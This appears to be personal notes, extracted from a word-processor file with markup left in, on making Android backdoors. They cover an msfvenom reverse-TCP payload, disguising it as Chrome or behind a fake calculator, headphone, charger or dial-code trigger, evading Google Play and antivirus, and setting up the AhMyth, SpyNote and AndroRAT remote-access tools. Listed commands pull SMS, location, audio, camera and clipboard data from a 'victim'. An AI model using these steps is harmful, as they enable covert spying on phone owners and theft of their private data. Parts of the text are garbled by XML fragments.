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vmware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kali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LD player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**Build Simple Backdoor(using msfvenom)**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msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.103 lport= 5566 -o hack.apk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paste apk in host pcs desktop, drag and drop to LD Player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#msfconsole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use exploit/multi/handler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set payload android/meterpreter/reverse_tcp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set lhost 192.168.1.103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set lport 5566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exploit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 APK in LD player and meterpreter connected.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 Build Backdoor in LD Player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download ‘aide_ide_v.3.2.210316 Unlocked’(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liteapks.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> website)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LD Player( &gt; For Experts &gt; New Android App &gt; clone git repository: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https://github.com/giovannicolonna/msfvenom-backdoor-android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app/src/main/res/layout/activity_main.xml&gt; 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&lt;WebView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android:id="@+id/webview"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android:layout_width="fill_parent"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android:layout_height="fill_parent" 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paste and save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app/src/main/java/stage/metasploit/com/backdoored/mainactivity.java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these lines, paste, save.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android.webkit.WebView;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[after  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:shd w:fill="999999" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">super.oncreate…</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. line,paste]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setContentView(R.layout.activity_main);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WebView webView = (WebView) findViewById(R.id.webview);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webView.getSettings().setJavaScriptEnabled(true);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webView.loadUrl("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</w:t>
        </w:r>
      </w:hyperlink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‘payload.java’ &gt; change local host,local port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and Run Icon. Location: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:shd w:fill="d9d9d9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/Android/Data/UI/apk/app.apk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msfconsole multihandler similarly.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 Inject App with Package Name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‘apk easy tool v1 60 portable’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‘chrome apk’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&amp; drop in “Easy Tool”, copy package name(it is “com.android.chrome”), paste in the code.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Intent launchIntent = getPackageManager().getLaunchIntentForPackage("</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">com.android.chrome</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">");startActivity(launchIntent);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new code repository[in LD player]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mainactivity.java(after ‘super….’ line, paste the code) &gt; Save.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Payload.java[set host:port]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apk [it opens chrome]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start msfconsole multihandler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** Change APP Icon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JDK Download ( oracle website, x64 handler)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JRE Download ( Java, Offline 64 bit)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APK Icon Editor (qwertycube website)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LD Player&gt; AIDE &gt; set ‘Payload.java’(host:port)&gt; install &gt; move to host pc&gt; download “chrome.png” image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APK Icon Editor&gt; drag and drop(app.apk) &gt; 72-192 &gt; replace all icons&gt; pack apk&gt; Name: hack app&gt; save &gt; move </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hack app.apk </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to LD player.[open it chrome.]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 msfconsole.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** Change Name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APK editor( download from uptodown website)&gt; move to LD player&gt; select apk from app&gt; Backdoored APK&gt; Common Edit&gt; Name: Chrome &gt; Save&gt; Close &gt; File Manager&gt; APK editor/tmp/gen_signed.apk(uninstalled previous Backdoored.apk and install this gen_signed.apk)&gt; Name App name Changed!!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 Hack by Calculator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Cloner_2.1.1_full-apkdone.com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https://www.mediafire.com/file/zqvfbgldmt55o2n/App+Cloner_2.1.1_full_apkdone.com.apk/file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#msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.103 lport=5566 -o myapp.apk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copy to host pc’s desktop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App Cloner&gt; Main Activity(our app)&gt; Privacy&gt; fake calculator(on)- type 2001&gt; ok&gt; name: Calc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Clone Icon</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; allow&gt; ok&gt; Install App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&gt; Finally start msfconsole multihandler and from app type 2001 to start the session.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** Hack by Headphone Jack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Uninstall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App Cloner &gt; Main Activity(our app) &gt; launching option&gt; headphone events&gt; startapp&gt;ok&gt; name: headphone&gt; ok&gt; clone &gt; install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** Hack by Charging Port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Uninstall ‘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headphone</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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App cloner&gt; Main Activity(our app) &gt; launching option&gt; Power Events&gt; On&gt; Start APP&gt; ok &gt; name: charing app&gt; clone&gt; install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** Hack by dial code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uninstall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charging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App cloner&gt; Main activity&gt; launching option&gt; secret dial code&gt; 2001&gt; ok (need to dial *#*#2001#*#*) &gt; name: call apps&gt;clone&gt;allow&gt;ok&gt;install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** Most Important Commands(meterpreter)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sysinfo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app-list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app-run com.whatsapp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app_uninstall com.whatsapp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screenshare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** Bypass Google Play and Antivirus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APK easy tool&gt; drag and drop </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">myapp(our hacking app)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; decompile&gt; compile.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 Install ahmyth framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F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https://github.com/Morsmalleo/AhMyth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# sudo apt-get install openjdk-11-jdk* -y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081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https://github.com/Morsmalleo/AhMyth/releases/tag/v1.0-beta.5a</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (download amd64.deb file)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# cd /home/kali/Downloads</w:t>
        <w:tab/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# ls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#sudo apt-get install ./AhMyth-Setup_amd64.deb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All Programs &gt; Ahmyth &gt; Apk Builder &gt; Kali IP and Port(5566) &gt; Permissions(all)&gt; Build (apk)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Location:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /kali/Ahmyth/output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Copy apk to host pc desktop, drag and drop to LD Player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Ahmyth&gt; victims&gt; port:5566&gt; listen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Open Apk(we see victim)&gt; open the lab.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😀 to download java 11 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# curl -s “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https://get.sdkman.io</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” | bash\nsource “$HOME/.sdkman/bin/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sdkman-init.sh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# sdk install java 11.0.28-tem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sdk use java 11.0.28-tem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sudo update-alternatives –install /user/bin/java java /home/kali/.sdkman/candidates/java/11.0.28-tem/bin/java 1111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sudo update-alternatives –install /user/bin/javac javac /home/kali/.sdkman/candidates/java/11.0.28-tem/bin/javac 1111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sudo update-alternatives –config java [select 1]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sudo update-alternatives –config javac [select 1]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** Install Spynote(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https://github.com/4btin/SpyNote-v6.4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Download ZIP&gt; extract &gt; install &gt; port 9595 &gt; tools &gt; payload &gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Program Files\Java\Jre1.8.0-202\bin\java.exe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ok&gt; DNS: your ip, port 9595; ✅hide,✅device,✅permission &gt; build [ apk created in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\build-6.1\apktool\out</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">]&gt; drag and drop to LD player(app hidden).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In spynote, we get access to victims phone(we can chat with him also)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** Install Framework of Androrat Tool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# git clone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https://github.com/karma9874/AndroRAT</w:t>
        </w:r>
      </w:hyperlink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# cd AndroRAT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# python3 -m venv venv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# source venv/bin/activate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# pip install -r requirements.txt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# source venv/bin/activate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# python3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androRAT.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> –build -i </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali_ip </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p 5566 -o androrat.apk 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[saved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home/kali/AndroRAT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move to the host pc desktop. move to LD player.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# python3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androRAT.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> –shell -i </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali_ip </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p 5566 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[waiting for connections.]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open apk in LD player[session started]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&gt; deviceinfo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&gt; getip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&gt; startAudio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&gt; stopAudio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&gt; getMACAddress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&gt; getLocation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&gt; camlist [front camera and back camera]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&gt; getSMS inbox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&gt; getClip Data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More Commands in the Github link.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orsmalleo/AhMyth/releases/tag/v1.0-beta.5a" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Morsmalleo/AhMyth" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sdkman-init.sh" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://get.sdkman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iafire.com/file/zqvfbgldmt55o2n/App+Cloner_2.1.1_full_apkdone.com.apk/file" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/karma9874/AndroRAT" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/4btin/SpyNote-v6.4" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://androrat.py" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://androrat.py" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://liteapks.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/giovannicolonna/msfvenom-backdoor-android" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtub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